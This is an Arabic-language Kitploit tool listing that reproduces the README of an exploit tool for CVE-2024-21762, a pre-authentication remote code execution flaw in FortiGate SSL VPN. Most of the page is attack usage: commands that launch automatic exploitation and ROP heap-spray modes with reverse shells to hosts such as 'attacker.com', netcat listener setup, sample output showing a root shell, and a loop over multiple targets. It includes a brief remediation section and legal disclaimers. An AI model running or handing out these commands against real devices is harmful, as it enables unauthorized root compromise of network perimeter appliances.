Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21762 — يكتشف ويستغل CVE-2024-21762 RCE قبل المصادقة في FortiGate SSL VPN، ويتميز بالتحقق الأساسي والاستغلال التلقائي ووضع رش كومة ROP وصدفة عكسية. | Kitploit
أدوات/GitHubGitHub/0x13-bytezer0/cve-2024-21762
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHub0x13-bytezer0/cve-2024-21762

CVE-2024-21762

يكتشف ويستغل CVE-2024-21762 RCE قبل المصادقة في FortiGate SSL VPN، ويتميز بالتحقق الأساسي والاستغلال التلقائي ووضع رش كومة ROP وصدفة عكسية.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21762 - أداة كشف واستغلال FortiGate SSL VPN RCE

Python 3.7+ License Vulnerability: Critical

أداة كشف واستغلال لـ CVE-2024-21762 - ثغرة حرجة في FortiGate SSL VPN

⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة حصريًا للاستخدام في بيئات الاختبار المصرح بها. الاستخدام غير المصرح به على الأنظمة غير قانوني وقد يؤدي إلى عواقب قانونية خطيرة.

نظرة عامة

CVE-2024-21762 هي ثغرة حرجة في مكونات FortiGate SSL VPN تسمح بـ تنفيذ الأوامر عن بُعد (RCE) بدون مصادقة مسبقة. العطل موجود في تحليل ضعيف لطلبات HTTP باستخدام ترميز chunked، مما يؤدي إلى كتابة خارج الحدود في المكون sslvpnd.

التفاصيل الفنية

السمةالمعلومات
CVE IDCVE-2024-21762
الثغرةكتابة خارج الحدود في sslvpnd
النوعتنفيذ الأوامر عن بُعد (RCE) بدون مصادقة مسبقة
درجة CVSS9.8 (حرجة)
المكون المتأثرFortiOS SSL VPN
الإصدارات الضعيفة7.0.0-7.0.13، 7.2.0-7.2.6، 7.4.0-7.4.2

الميزات

✅ كشف الثغرة - تحديد FortiGate الضعيفة من خلال طلبات مشوهة
✅ اختبار الأساس - التحقق من السلوك الطبيعي للخادم قبل الاختبارات
✅ الوضع التلقائي - كشف الثغرة واستغلالها تلقائيًا
✅ شل عكسي - دعم شل عكسي bash مع تكوين IP/منفذ
✅ التحقق من الإدخال - التحقق من صحة عناوين IP والمنافذ قبل الاستغلال
✅ تقارير مفصلة - إنشاء تقارير مع توصيات للمعالجة
✅ معالجة قوية للأخطاء - إدارة آمنة للاتصالات والاستثناءات

المتطلبات

  • Python 3.7 أو أحدث
  • وحدات مكتبة Python القياسية (socket, ssl, argparse, datetime, time, re)
  • وصول شبكي إلى الهدف (المنفذ 443 أو منفذ مخصص)

التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/your-username/CVE-2024-21762.git
cd CVE-2024-21762

# Check syntax
python -m py_compile EXPLOIT.py

# Run the script
python EXPLOIT.py -h

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Simple detection test
python EXPLOIT.py 192.168.1.100

# With custom port
python EXPLOIT.py 192.168.1.100 -p 8443

# With increased timeout
python EXPLOIT.py 192.168.1.100 --timeout 20

الوضع التلقائي (كشف + استغلال)

root@kitploit:~
# Automatic mode with preconfigured reverse shell
python EXPLOIT.py 192.168.1.100 --auto -li 10.0.0.5 -lp 4444

# Automatic mode without credentials (asks interactively)
python EXPLOIT.py 192.168.1.100 --auto

وضع ROP - استغلال متقدم مع Heap Spray

وضع ROP ينفذ استغلالًا من مرحلتين مع heap spray لأهداف محددة (FortiOS 7.4.2):

root@kitploit:~
# ROP exploitation with Node.js reverse shell
python EXPLOIT.py 192.168.1.100 --rop -li 10.0.0.5 -lp 4242

# With custom port
python EXPLOIT.py 192.168.1.100 -p 8443 --rop -li attacker.com -lp 4242

# With increased timeout for slow targets
python EXPLOIT.py 192.168.1.100 --rop -li 192.168.1.50 -lp 9999 --timeout 30

تدفق استغلال ROP:

  1. المرحلة 1: إرسال heap spray بحجم 1.8 ميجابايت مع أدوات ROP
  2. انتظار ثانيتين لمعالجة وحدة المعالجة المركزية
  3. المرحلة 2: تشغيل الكتابة خارج الحدود مع كتلة بحجم 4137 بايت
  4. انتظار 3 ثوانٍ لتنفيذ الحمولة
  5. إنشاء اتصال عكسي Node.js

على خادم الاستماع الخاص بك:

root@kitploit:~
# Linux/Mac/Windows with netcat
nc -lnvp 4242

# Expected output:
# listening on [any] 4242 ...
# connect to [10.0.0.5] from (UNKNOWN) [192.168.1.100] 54321
# id
# uid=0(root) gid=0(root) groups=0(root)

⚠️ ملاحظة هامة: وضع ROP محسّن لـ FortiOS 7.4.2.F-build2571. الإصدارات الأخرى قد لا تعمل بسبب الإزاحات المضمنة في سلسلة ROP.

اختبار يدوي مع الشل العكسي

root@kitploit:~
# Send reverse shell payload
python EXPLOIT.py 192.168.1.100 -li 192.168.1.50 -lp 9999

# Combination of multiple options
python EXPLOIT.py -t target.com -p 8443 --auto -li attacker.com -lp 5555 --timeout 15

الخيارات المتاحة

root@kitploit:~
positional arguments:
  target                    اسم المضيف الهدف أو IP المراد اختباره

optional arguments:
  -h, --help               يعرض رسالة المساعدة هذه
  -t, --target HOSTNAME    اسم المضيف الهدف أو IP (بديل)
  -p, --port PORT          منفذ SSL VPN (الافتراضي: 443)
  --timeout SECONDS        المهلة بالثواني (الافتراضي: 10)
  -li, --lhost IP          IP المحلي لاستقبال الشل العكسي
  -lp, --lport PORT        المنفذ المحلي لاستقبال الشل العكسي
  --no-baseline            تخطي اختبار الأساس
  --auto                   الوضع التلقائي: كشف واستغلال
  --rop                    وضع ROP: استغلال متقدم مع heap spray (FortiOS 7.4.2)
  -v, --version            يعرض إصدار البرنامج النصي

أمثلة استخدام كاملة

1. كشف بسيط

root@kitploit:~
python EXPLOIT.py 192.168.1.100

النتيجة المتوقعة في حالة الثغرة:

root@kitploit:~
[+] بدء اختبار الثغرة...
[!] تم اكتشاف ضعف!
[!] الخادم أنهى الاتصال فجأة
[!] الحالة: ضعيف

2. استغلال تلقائي مع شل عكسي

root@kitploit:~
python EXPLOIT.py 192.168.1.100 --auto -li 192.168.1.50 -lp 4444

على خادمك:

root@kitploit:~
# Linux/Mac
nc -lnvp 4444

# Windows
ncat -lnvp 4444

3. اختبار أهداف متعددة

root@kitploit:~
for target in 192.168.1.100 192.168.1.101 192.168.1.102; do
  python EXPLOIT.py $target --timeout 15
done

كيفية العمل

تدفق الكشف

  1. اختبار الأساس - إرسال طلب HTTP عادي للتحقق من السلوك الافتراضي
  2. الطلب المشوه - إرسال طلب HTTP مشوه مع ترميز chunked ضعيف
  3. التحليل - تحليل الرد لاكتشاف علامات الثغرة:
    • إنهاء الاتصال فجأة
    • مهلة/تعطل الخادم
    • تنبيهات TLS غير طبيعية
  4. التقرير - إنشاء تقرير مع الحالة والتوصيات

تدفق الاستغلال (الوضع التلقائي)

  1. تنفيذ اختبار الكشف
  2. إذا كان ضعيفًا، حقن حمولة الشل العكسي
  3. انتظار الاتصال العكسي
  4. إنشاء التقرير النهائي

مؤشرات الثغرة

تعتبر الأداة الهدف ضعيفًا عند اكتشاف أحد السلوكيات التالية:

  • ✓ إنهاء الاتصال فجأة (رد فارغ)
  • ✓ مهلة بعد إرسال الحمولة (تعطل الخادم)
  • ✓ تلقي تنبيه TLS (تعطل sslvpnd)
  • ✓ إعادة تعيين الاتصال من قبل النظير

الإصدارات المتأثرة

الإصدارالكشفوضع ROPالحالة
FortiOS 7.0.0 - 7.0.13✅ نعم❌ لا⚠️ ضعيف
FortiOS 7.2.0 - 7.2.6✅ نعم❌ لا⚠️ ضعيف
FortiOS 7.4.0 - 7.4.1✅ نعم❌ لا⚠️ ضعيف
FortiOS 7.4.2 (build≤2571)✅ نعم✅ نعم⚠️ ضعيف
FortiOS 7.4.3+❌ لا❌ لا✅ مصحح

المعالجة

إجراءات فورية

  1. تحديث FortiOS إلى إصدار مصحح:

    • FortiOS 7.0.14+
    • FortiOS 7.2.7+
    • FortiOS 7.4.3+
  2. عزل مؤقت

    • تعطيل الوصول الخارجي إلى SSL VPN
    • تقييد الوصول الإداري
  3. مراقبة

    • مراجعة السجلات بحثًا عن علامات استغلال
    • التحقق من بيانات الاعتماد والوصول غير الطبيعي

التحقق لاحقًا

root@kitploit:~
# Check FortiOS version
python EXPLOIT.py your-fortinet.com

إذا أظهرت النتيجة "غير ضعيف"، فقد تم تطبيق التصحيح بنجاح.

هيكل المشروع

root@kitploit:~
CVE-2024-21762/
├── EXPLOIT.py          # البرنامج النصي الرئيسي للاستغلال
├── README.md           # هذا الملف
├── LICENSE             # ترخيص MIT
└── .gitignore          # إعدادات Git

طرق الفئة

CVE2024_21762_Detector

الطريقةالوصف
test_vulnerability()اختبار الثغرة عن طريق إرسال طلب مشوه
exploit(lhost, lport)استغلال الثغرة بشل عكسي
test_baseline()اختبار السلوك الطبيعي للخادم
generate_report()إنشاء تقرير نهائي مع الحالة
_create_ssl_context()إنشاء سياق SSL قابل لإعادة الاستخدام
_create_socket_connection()إنشاء اتصال TLS آمن
_close_socket(sock)إغلاق socket بأمان
_is_valid_ip(ip_str)التحقق من صحة تنسيق IP

معالجة الأخطاء

تطبق الأداة:

  • ✓ التحقق القوي من الإدخال
  • ✓ معالجة استثناءات SSL/TLS
  • ✓ المهلة في الاتصالات
  • ✓ إغلاق آمن للـ sockets
  • ✓ رسائل خطأ وصفية

القيود

  • ⚠️ يتطلب اتصال شبكي بالهدف
  • ⚠️ يكشف الثغرة لكن لا يضمن نجاح الاستغلال
  • ⚠️ يعتمد الشل العكسي على البيئة الهدف (يتطلب bash)
  • ⚠️ لا يعمل مع جدار حماية مقيد

الأسئلة الشائعة

س: هل يمكن استخدامه في بيئة Windows؟
ج: نعم، يعمل البرنامج النصي Python على Windows، لكن الشل العكسي bash الافتراضي لن يعمل. ستحتاج إلى حمولة مخصصة.

س: كيف أعرف أن الاستغلال نجح؟
ج: تحقق من الجهاز الذي يستمع للشل العكسي (nc/ncat). سيعرض البرنامج النصي رسائل تشير إلى التقدم.

س: هل يمكنني استخدامه ضد أهداف متعددة؟
ج: نعم، يمكنك إنشاء برنامج نصي bash/PowerShell للتكرار على قائمة عناوين IP.

س: ما الفرق بين الوضع العادي والوضع التلقائي؟
ج: الوضع التلقائي يستغل تلقائيًا إذا تم العثور على ثغرة. الوضع العادي يكتشف فقط.

المساهمة

وجدت خطأ أو لديك اقتراحات؟ افتح issue أو أرسل pull request!

الترخيص

هذا المشروع مرخص بموجب ترخيص MIT - راجع ملف LICENSE للتفاصيل.

إخلاء المسؤولية

يتم توفير هذا البرنامج "كما هو" لأغراض البحث والاختبار المصرح به. المؤلفون ليسوا مسؤولين عن:

  • الأضرار الناجمة عن الاستخدام غير المصرح به
  • فقدان البيانات
  • التأثير على أنظمة الإنتاج
  • العواقب القانونية للاستخدام غير المصرح به

استخدم بمسؤولية وفقط في البيئات المصرح بها

المراجع

  • Fortinet Security Advisory
  • NVD - CVE-2024-21762
  • CVSS Calculator

المؤلف

تم تطويره لأغراض تعليمية وبحثية في مجال الأمن السيبراني.


⚠️ تذكر: استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الاستغلال غير المصرح به جريمة.

تنزيل الأداة